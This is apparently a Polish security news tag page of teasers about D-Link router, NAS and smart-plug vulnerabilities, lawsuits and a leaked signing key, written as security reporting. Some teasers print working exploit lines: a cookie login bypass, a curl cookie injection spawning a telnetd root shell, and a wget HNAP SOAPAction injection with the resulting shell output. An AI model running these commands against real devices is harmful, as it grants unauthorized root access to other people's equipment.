Jeśli jesteście właścicielami starszego modelu urządzenia typu NAS firmy D-Link, przeczytajcie koniecznie – nie mamy dla Was dobrych wiadomości. Nowy użytkownik GitHuba netsecfish (konto założone dwa tygodnie temu, posiadające jednego obserwującego oraz trzy publiczne repozytoria) udostępnił informację o podatności dotykającej wielu starszych urządzeń D-Linka z linii dysków sieciowych. Luka sklasyfikowana…
Czytaj dalej »
Esencja tego badania jest taka: Można się uśmiechnąć pod nosem – tego typu podatność (w pingu) to chyba najstarsza, łatwa do znalezienia i wykorzystania podatność znajdowana w urządzeniach IoT (wielokrotnie również przez nas :) Czy wymagane jest uwierzytelnienie? Powyższe żądanie HTTP zwraca stronę do logowania. Wymagane jest więc podanie loginu…
Czytaj dalej »
W skrócie: An attacker can join the network provided by the affected router without the required credentials, and mount further attacks to the users of the network. Podatne jest urządzenie: D-Link DIR-850L (wersja sprzętowa: A). Problem jest w tzw. 4-way handshake w algorytmie WPA (dokładniej: w implementacji D-Linka) i router…
Czytaj dalej »
ESET donosi o ostatniej aktywności grupy Blacktech. Panowie (i być może panie) z tej ekipy nie przebierają w środkach – byli w stanie przeniknąć do infrastruktury D-Linka (i jeszcze jednej tajwańskiej firmy) / wykraść stosowne certyfikaty (zwierające klucze prywatne i być może jeszcze kolejne dane – klucze symetryczne do kluczy…
Czytaj dalej »
Federalna Komisja Handlu (ang. Federal Trade Commision, FTC) złożyła pozew przeciwko producentowi D-Link oskarżając go o pozostawienie urządzeń typu routery, czy kamery internetowe podatnych na ataki. Pozew został złożony do Sądu Rejonowego w San Francisco. Nasz serwis nie raz miał do czynienia z tym producentem dlatego fakt ten nie wzbudza…
Czytaj dalej »
Tym razem mamy gratkę dla badaczy bezpieczeństwa IoT – dokładna analiza podatności klasy buffer overflow w wybranych modelach D-Linka. Tym razem chodzi o protokół HNAP i modele: DIR-823 DIR-822 DIR-818L(W) DIR-895L DIR-890L DIR-885L DIR-880L DIR-868L (Rev. B and C) Atak na szczęście można przeprowadzić tylko z LAN (uzyskując roota na…
Czytaj dalej »
Jeśli jesteś (nie)szczęśliwym posiadaczem routera DWR-932 B LTE, powinieneś jak najszybciej pomyśleć nad alternatywą, niż czekać na aktualizację firmware. Chyba, że chcesz dołączyć swój domowy / firmowy styk z Internetem do botnetu. Dlaczego? Jak dowiódł Pierre Kim, DWR-932 B LTE, ma wiele luk oraz realizuje swoje funkcje wbrew podstawowym zasadom bezpieczeństwa, które powinny być…
Czytaj dalej »
Ostatnio pokazał się krótki ale treściwy opis podatności w routerze: D-Link DSL-2750B. Całość jest bezczelnie prosta do wykorzystania: wystarczy przekazać (bez uwierzytelnienia) odpowiedni parametr cli – do strony logowania, po czym uzyskujemy uprawnienia root na urządzeniu. Jeśli macie D-Linka warto sprawdzić czy nie macie podobnego problemu: –ms
Czytaj dalej »
Klucz publiczny, klucz prywatny – co za różnica… Tak chyba do tematu kryptografii podchodzi firma D-Link, która (przypadkowo?) udostępniła w swoim repozytorium GPL klucz prywatny, który może służyć do podpisu plików binarnych pod Windows. Tak podpisana binarka nie będzie wyświetlała ostrzeżenia w Windows o potencjalnie niezaufanym pliku, ładnie za to…
Czytaj dalej »
Ciekawe znalezisko w dość popularnych routerach D-linka. Analizując komunikację HTTP pomiędzy przeglądarką a routerem, autor postu znalazł w jednej z odpowiedzi od routera taki kawałek JavaScriptu: <script> document.cookie = 'hasLogin=1′; location.replace(’index.asp’); </script> Który rzeczywiście wygląda mocno podejrzanie. Dalej, po prostu (bez znajomości loginu i hasła) ustawił ww. ciastko (haslLogin=1) w…
Czytaj dalej »
Peter Adkins umieścił na githubie swoje badania nad inteligentnym gniazdkiem elektrycznym D-Linka (DSP-W110). Nie będę jeszcze raz wszystkiego przepisywał z oryginalnego researchu ;) ale odpalenie shella wygląda tu bajecznie prosto: # Spawn a root shell (telnet) curl \ –cookie „terribleness=\`telnetd -l/bin/sh\`” \ 192.168.1.3 Podobnie wygląda historia z uploadem dowolnego…
Czytaj dalej »
Niedawno pisaliśmy o nowych D-Linkach, a teraz pojawiło się ciekawe badanie pokazujące w jaki sposób zrealizować nieuwierzytelniony dostęp na root-a. Wystarczy jeden prosty request HTTP… wget –header=’SOAPAction: „http://purenetworks.com/HNAP1/GetDeviceSettings/`telnetd`”’ http://192.168.0.1/HNAP1 $ telnet 192.168.0.1 Trying 192.168.0.1… Connected to 192.168.0.1. Escape character is '^]’. BusyBox v1.14.1 (2015-02-11 17:15:51 CST) built-in shell (msh) Enter…
Czytaj dalej »
Niedawno D-link ogłosił nową serię routerów WiFi: AC5300, AC3200 and AC3100, z których najszybszy może pochwalić się równoczesnym maksymalnym transferem na poziomie powyżej 5Gbps(!). Urządzenia prędkość taką uzyskują, wykorzystując standard 802.11ac, działający w trzech częstotliwościach równolegle (2x w 5GHz i 1x w 2,4GHz). Całość ma też dość ciekawą stylistykę (choć…
Czytaj dalej »
Jakiś czas temu pisaliśmy o hacku na „inteligentne” gniazdka elektyczne Belkina, tym razem okazało się że z D-Linkiem też nie ma problemu (dostęp na interaktywnego roota na urządzeniu). Zachęcam do zakupów, bo niedługo podatne wersje będą wykupione! To oczywiście żart, bo urządzenia tego typu są tak podatne, że zapewne zaraz…
Czytaj dalej »
Publikujemy badanie naszego czytelnika, które dotyczy pewnej wcześniej niepublikowanej podatności na urządzeniach D-Link. Całość pokazana ze szczegółami – łącznie z tak istotną rzeczą jak uruchomienie wyciągniętej z firmware binarki na emulatorze i debugowanie jej w takim właśnie środowisku.
Czytaj dalej »